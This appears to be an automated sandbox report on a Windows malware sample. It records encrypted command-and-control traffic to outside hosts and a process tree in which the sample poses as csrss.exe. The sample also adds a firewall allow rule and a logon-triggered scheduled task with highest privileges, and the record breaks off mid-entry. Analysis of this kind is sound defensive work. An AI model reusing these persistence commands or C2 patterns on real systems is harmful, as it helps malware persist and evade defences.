2021-11-11 19:35:33 UTC	21	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 19:35:33 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZEskwX9w7lpIdtUinZcRTY2QBVMlj0LlEZoohy2rXUMZio1KTGEsvMVYERsP%2FzlgrMq9vnazyYmJottu%2FLejMPKToc761NwJhDbADc3f1Zv%2BmmEAeljPBmebOneq1B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f6e1bc974a56-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49748	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 19:35:37 UTC	22	OUT	POST /api/poll HTTP/1.1 Host: server3.trumops.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/80.0.3987.87 Chrome/80.0.3987.87 Safari/537.36 Content-Length: 652 Accept-Encoding: gzip
2021-11-11 19:35:37 UTC	22	OUT	Data Raw: 54 62 76 34 72 34 69 6e 5a 73 78 47 66 61 41 52 57 6f 70 4b 2f 4b 4a 44 6d 62 49 66 34 35 7a 75 42 69 4c 34 52 78 6c 78 42 50 72 2f 4b 50 78 56 74 62 38 4e 68 34 75 73 65 50 75 68 32 48 2f 78 45 35 69 70 62 7a 56 4a 47 58 6d 69 53 56 75 4b 67 6d 71 7a 78 6f 4d 59 34 30 55 76 2f 4e 65 41 64 38 79 67 51 46 76 71 39 63 2b 57 5a 46 70 36 71 31 6f 6f 55 36 48 6a 44 73 2f 75 75 4f 68 78 57 31 77 4c 6c 48 4f 6a 31 54 57 35 6e 79 67 67 70 55 48 5a 55 31 44 4e 6a 68 36 78 35 36 69 39 2b 6e 6e 48 5a 70 59 6f 7a 79 6f 74 6e 53 65 78 4f 76 79 46 48 2f 72 39 6b 67 51 57 64 65 71 49 73 66 63 6f 4d 6d 47 6b 2b 58 76 66 65 6b 45 36 45 44 46 59 75 50 45 6a 38 47 56 39 36 31 43 6c 6b 6a 70 59 55 67 31 41 78 35 54 75 73 33 6f 37 51 5a 46 6e 57 51 6a 51 4b 77 72 70 42 4c 69 Data Ascii: Tbv4r4inZsxGfaARWopK/KJDmbIf45zuBiL4RxlxBPr/KPxVtb8Nh4usePuh2H/xE5ipbzVJGXmiSVuKgmqzxoMY40Uv/NeAd8ygQFvq9c+WZFp6q1ooU6HjDs/uuOhxW1wLlHOj1TW5nyggpUHZU1DNjh6x56i9+nnHZpYozyotnSexOvyFH/r9kgQWdeqIsfcoMmGk+XvfekE6EDFYuPEj8GV961ClkjpYUg1Ax5Tus3o7QZFnWQjQKwrpBLi
2021-11-11 19:35:37 UTC	23	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Nov 2021 19:35:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 set-cookie: PHPSESSID=4vldu1scrrpcspdhkuu3ka9fnh; path=/; HttpOnly expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w%2FSRTvKYrEtJCgQJudOl4mEoCl42VZ21LylxF13UV71mdnMd%2Faol5Yp5pxSj%2BswODdLCYMP3eIVPFa9sl85XFuj0UouYrZCuOS%2F8WKEjt3rSe9oezdyQjMbllAbT3Q1v10BSBKd1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f6fbaafd743b-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 19:35:37 UTC	24	IN	Data Raw: 65 38 0d 0a 44 69 36 48 71 72 58 64 45 49 51 47 67 4e 6b 78 65 78 67 52 72 42 6e 59 34 73 62 61 39 51 63 6d 4b 62 38 62 50 34 41 62 2f 58 51 46 72 53 62 42 70 31 35 6a 66 38 33 45 6c 30 32 37 5a 56 2b 50 69 41 66 76 53 33 76 33 58 54 41 38 46 51 62 48 43 4a 34 43 2f 36 35 64 75 70 77 56 56 75 71 59 75 6d 7a 76 6f 30 72 71 4e 33 6a 4a 69 5a 75 69 6b 71 70 6a 49 44 4f 48 73 35 34 39 6f 64 52 55 42 62 66 79 61 32 79 69 79 59 69 64 68 45 2b 4a 54 38 4e 44 37 37 74 41 34 62 37 57 37 31 6f 73 56 37 77 42 69 54 6b 50 6d 45 52 58 33 51 72 2f 57 78 6e 38 54 73 6d 38 72 4b 42 48 45 4b 38 56 4d 42 2b 7a 47 32 33 6b 4a 77 55 51 63 47 32 7a 58 46 46 53 73 51 2b 45 6a 45 51 75 69 53 58 30 48 57 48 31 42 41 3d 3d 0d 0a Data Ascii: e8Di6HqrXdEIQGgNkxexgRrBnY4sba9QcmKb8bP4Ab/XQFrSbBp15jf83El027ZV+PiAfvS3v3XTA8FQbHCJ4C/65dupwVVuqYumzvo0rqN3jJiZuikqpjIDOHs549odRUBbfya2yiyYidhE+JT8ND77tA4b7W71osV7wBiTkPmERX3Qr/Wxn8Tsm8rKBHEK8VMB+zG23kJwUQcG2zXFFSsQ+EjEQuiSX0HWH1BA==
2021-11-11 19:35:37 UTC	24	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49750	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 19:35:48 UTC	24	OUT	GET /api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f HTTP/1.1 Host: server3.trumops.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2021-11-11 19:35:48 UTC	24	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 19:35:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ra3la1xuXXEo%2FuoQ5xW08lov9CYIHIgkFznsILZRTF0zyCBqtkm82UvTJIGEd40REf4yx3am4JXzxBdzXpZoxM6O%2BRJef9Ud49kcxesyLDYfXADn%2BVKcAq8GBnVrt1XjBPfH3JAF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f7424d5774c9-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 19:35:48 UTC	25	IN	Data Raw: 31 33 34 0d 0a 31 37 61 70 69 55 74 4d 55 70 41 72 57 4c 66 70 51 49 65 2b 54 66 76 43 6b 59 55 51 6a 51 77 30 49 6f 77 53 48 36 37 68 53 5a 55 66 4e 76 4e 35 38 69 43 70 61 6b 2f 4a 34 45 6f 6a 6b 2f 49 32 57 6d 4b 59 61 58 31 76 2b 39 36 34 42 78 65 66 59 2f 34 63 76 4c 32 35 73 57 42 69 43 35 63 31 42 66 5a 67 69 48 73 39 39 44 73 78 6b 31 34 37 75 54 69 50 55 59 74 6f 67 52 62 51 35 79 72 54 7a 37 6e 6c 6c 31 41 65 4b 31 65 74 66 4e 4a 69 79 43 37 62 58 55 69 5a 78 41 39 49 4e 72 43 52 71 46 53 33 47 65 53 35 57 36 47 35 42 31 37 33 74 68 6e 6d 32 75 4c 6b 42 45 61 56 45 75 50 6c 6c 6e 6c 37 72 57 43 51 35 50 55 63 34 55 4e 4a 55 46 31 31 51 39 67 51 6b 79 51 6f 32 50 32 4b 74 6c 6d 58 32 67 4a 30 32 37 4d 7a 47 65 52 62 58 2f 47 57 6a 42 61 69 4d 35 Data Ascii: 13417apiUtMUpArWLfpQIe+TfvCkYUQjQw0IowSH67hSZUfNvN58iCpak/J4Eojk/I2WmKYaX1v+964BxefY/4cvL25sWBiC5c1BfZgiHs99Dsxk147uTiPUYtogRbQ5yrTz7nll1AeK1etfNJiyC7bXUiZxA9INrCRqFS3GeS5W6G5B173thnm2uLkBEaVEuPllnl7rWCQ5PUc4UNJUF11Q9gQkyQo2P2KtlmX2gJ027MzGeRbX/GWjBaiM5
2021-11-11 19:35:48 UTC	25	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49752	104.21.34.203	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 19:36:01 UTC	26	OUT	POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 160 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2021-11-11 19:36:01 UTC	26	OUT	Data Raw: 78 4c 46 5a 6e 76 56 59 34 74 58 46 52 52 61 48 5a 47 57 74 4f 62 6f 6b 59 4f 38 7a 72 43 2f 39 7a 64 36 32 76 58 4d 67 67 66 42 6c 44 31 4e 50 67 6d 77 74 54 74 69 2b 52 47 52 49 32 76 59 66 64 4c 67 64 6b 79 6e 39 4b 74 56 41 41 45 55 31 65 49 73 67 76 6f 44 37 63 50 78 6e 30 34 35 64 6b 67 33 52 6e 7a 33 34 37 58 54 78 33 30 57 41 55 65 78 75 59 30 58 50 63 70 2b 69 53 56 6a 36 52 2f 48 4e 54 51 6e 79 7a 67 63 48 64 6c 65 6f 75 4d 38 2f 55 52 66 65 46 5a 2b 44 32 41 3d 3d Data Ascii: xLFZnvVY4tXFRRaHZGWtObokYO8zrC/9zd62vXMggfBlD1NPgmwtTti+RGRI2vYfdLgdkyn9KtVAAEU1eIsgvoD7cPxn045dkg3Rnz347XTx30WAUexuY0XPcp+iSVj6R/HNTQnyzgcHdleouM8/URfeFZ+D2A==
2021-11-11 19:36:01 UTC	26	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 19:36:01 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ozqruw9MhSRxrKEYpqNqPeNGKGC8GczYkELhwjMv0q7xdNPQ%2BC%2BUA4ZnIu%2BKaHLqBQAYAv0U8dximvU0qPkJ%2FextS9G5I0DQ2U5HSyqq9J2IshwJiuW%2FBi99PUKn0dM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f791181b2b29-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49807	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 19:37:02 UTC	27	OUT	POST /api/poll HTTP/1.1 Host: server3.trumops.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 668 Accept-Encoding: gzip
2021-11-11 19:37:02 UTC	27	OUT	Data Raw: 78 42 69 48 2b 52 6f 2f 58 74 4e 39 4e 61 35 69 42 43 68 51 73 62 61 34 59 62 79 55 72 39 31 6f 61 69 75 6b 57 47 6b 49 33 58 72 75 4c 63 52 36 5a 56 78 71 2b 35 6a 47 31 42 66 38 4e 4c 39 45 55 32 4d 62 66 72 77 35 39 52 64 6a 35 51 4f 54 47 6c 71 75 77 72 53 45 75 57 68 6e 30 57 69 41 57 70 48 34 30 56 67 38 53 70 2b 64 66 57 34 31 44 61 2f 51 6b 71 56 67 74 58 63 52 30 30 58 4c 34 55 53 44 71 4a 4c 55 77 48 38 59 6a 2b 39 75 44 48 7a 45 55 35 6b 51 50 63 4f 51 64 45 75 62 73 4b 75 6e 50 47 61 30 54 78 44 49 45 51 6a 49 35 35 7a 51 76 7a 6b 47 72 63 4b 67 4f 4b 6f 36 4c 72 76 59 56 6f 66 39 61 62 77 55 31 38 35 79 32 49 2f 62 2f 45 69 65 63 2b 31 6e 36 73 45 56 61 6c 77 34 6b 76 71 5a 4a 6f 33 51 78 46 2b 6d 51 39 36 35 4b 45 77 70 38 46 32 4b 75 38 46 Data Ascii: xBiH+Ro/XtN9Na5iBChQsba4YbyUr91oaiukWGkI3XruLcR6ZVxq+5jG1Bf8NL9EU2Mbfrw59Rdj5QOTGlquwrSEuWhn0WiAWpH40Vg8Sp+dfW41Da/QkqVgtXcR00XL4USDqJLUwH8Yj+9uDHzEU5kQPcOQdEubsKunPGa0TxDIEQjI55zQvzkGrcKgOKo6LrvYVof9abwU185y2I/b/Eiec+1n6sEValw4kvqZJo3QxF+mQ965KEwp8F2Ku8F
2021-11-11 19:37:02 UTC	27	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Nov 2021 19:37:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 set-cookie: PHPSESSID=6afjhtvjo4rm2efnl9dt7t1rk1; path=/; HttpOnly expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YMbRGgJ2bGzGIGIXFb6v9e0wG%2BKBDHlgxtgTlLO5TOltDXIejwxR2ouZvDu5%2Fv1UgpfK778TuEaeYtjU0gQYezCTHP9oV9kTVjAZlULy%2BV9gDKFrggPJhGhvlZQtlD%2FEDY7zfduX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f90c5a1b779d-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 19:37:02 UTC	28	IN	Data Raw: 65 38 0d 0a 6a 2f 77 61 64 2b 4b 71 34 51 4c 32 46 4c 4b 31 47 68 65 36 62 66 31 37 76 39 48 5a 58 62 75 43 7a 75 31 61 79 4b 6d 38 56 41 4c 68 5a 30 36 65 46 31 67 61 62 32 59 7a 37 2b 49 66 6f 63 50 2f 4d 6a 32 4f 32 49 59 35 34 59 69 79 31 70 32 74 44 48 75 64 55 2b 4d 4f 73 51 78 65 71 6c 71 4b 68 75 64 4e 6a 41 53 47 36 69 65 37 33 74 65 4e 39 75 49 4b 37 65 43 73 37 7a 2f 32 51 61 50 68 6d 53 4f 69 32 6d 4d 38 2b 32 53 34 79 77 51 47 53 55 6a 62 66 52 76 50 51 6d 48 41 63 64 57 75 67 31 2b 63 6d 62 4d 65 6a 36 41 77 4f 47 38 63 53 38 50 64 6d 68 66 2b 62 67 74 79 63 37 63 66 78 36 4a 69 43 48 4d 56 4c 58 32 58 49 64 6c 64 54 6e 42 55 73 66 4a 53 76 51 45 76 69 38 65 6d 48 6c 55 47 62 41 3d 3d 0d 0a Data Ascii: e8j/wad+Kq4QL2FLK1Ghe6bf17v9HZXbuCzu1ayKm8VALhZ06eF1gab2Yz7+IfocP/Mj2O2IY54Yiy1p2tDHudU+MOsQxeqlqKhudNjASG6ie73teN9uIK7eCs7z/2QaPhmSOi2mM8+2S4ywQGSUjbfRvPQmHAcdWug1+cmbMej6AwOG8cS8Pdmhf+bgtyc7cfx6JiCHMVLX2XIdldTnBUsfJSvQEvi8emHlUGbA==
2021-11-11 19:37:02 UTC	29	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 1dyvctHqv1.exe PID: 7008 Parent PID: 5116

General

Start time:	20:35:00
Start date:	11/11/2021
Path:	C:\Users\user\Desktop\1dyvctHqv1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1dyvctHqv1.exe"
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 7140 Parent PID: 572

General

Start time:	20:35:03
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3324 Parent PID: 572

General

Start time:	20:35:03
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6232 Parent PID: 572

General

Start time:	20:35:04
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6228 Parent PID: 572

General

Start time:	20:35:05
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4848 Parent PID: 572

General

Start time:	20:35:06
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 5728 Parent PID: 572

General

Start time:	20:35:07
Start date:	11/11/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff73bc70000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: TrustedInstaller.exe PID: 3108 Parent PID: 572

General

Start time:	20:35:08
Start date:	11/11/2021
Path:	C:\Windows\servicing\TrustedInstaller.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\servicing\TrustedInstaller.exe
Imagebase:	0x7ff6a2fb0000
File size:	131584 bytes
MD5 hash:	4578046C54A954C917BB393B70BA0AEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 1744 Parent PID: 572

General

Start time:	20:35:08
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 1dyvctHqv1.exe PID: 5384 Parent PID: 7008

General

Start time:	20:35:08
Start date:	11/11/2021
Path:	C:\Users\user\Desktop\1dyvctHqv1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\1dyvctHqv1.exe
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000C.00000002.327502514.00000000051A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4816 Parent PID: 572

General

Start time:	20:35:11
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6860 Parent PID: 5384

General

Start time:	20:35:18
Start date:	11/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Imagebase:	0x7ff7fa260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6872 Parent PID: 6860

General

Start time:	20:35:19
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 6840 Parent PID: 6860

General

Start time:	20:35:19
Start date:	11/11/2021
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Imagebase:	0x7ff638640000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csrss.exe PID: 6644 Parent PID: 5384

General

Start time:	20:35:20
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\rss\csrss.exe /301-301
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 25%, ReversingLabs

Chronological Activities

Analysis Process: svchost.exe PID: 6820 Parent PID: 572

General

Start time:	20:35:21
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 7116 Parent PID: 6820

General

Start time:	20:35:21
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384
Imagebase:	0x20000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 7132 Parent PID: 5384

General

Start time:	20:35:22
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996
Imagebase:	0x20000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5128 Parent PID: 572

General

Start time:	20:35:28
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 5972 Parent PID: 6644

General

Start time:	20:35:29
Start date:	11/11/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Imagebase:	0x7ff6cdd90000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6160 Parent PID: 5972

General

Start time:	20:35:29
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 4860 Parent PID: 6644

General

Start time:	20:35:29
Start date:	11/11/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn ScheduledUpdate /f
Imagebase:	0x7ff6cdd90000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5072 Parent PID: 4860

General

Start time:	20:35:30
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mountvol.exe PID: 6596 Parent PID: 6644

General

Start time:	20:35:30
Start date:	11/11/2021
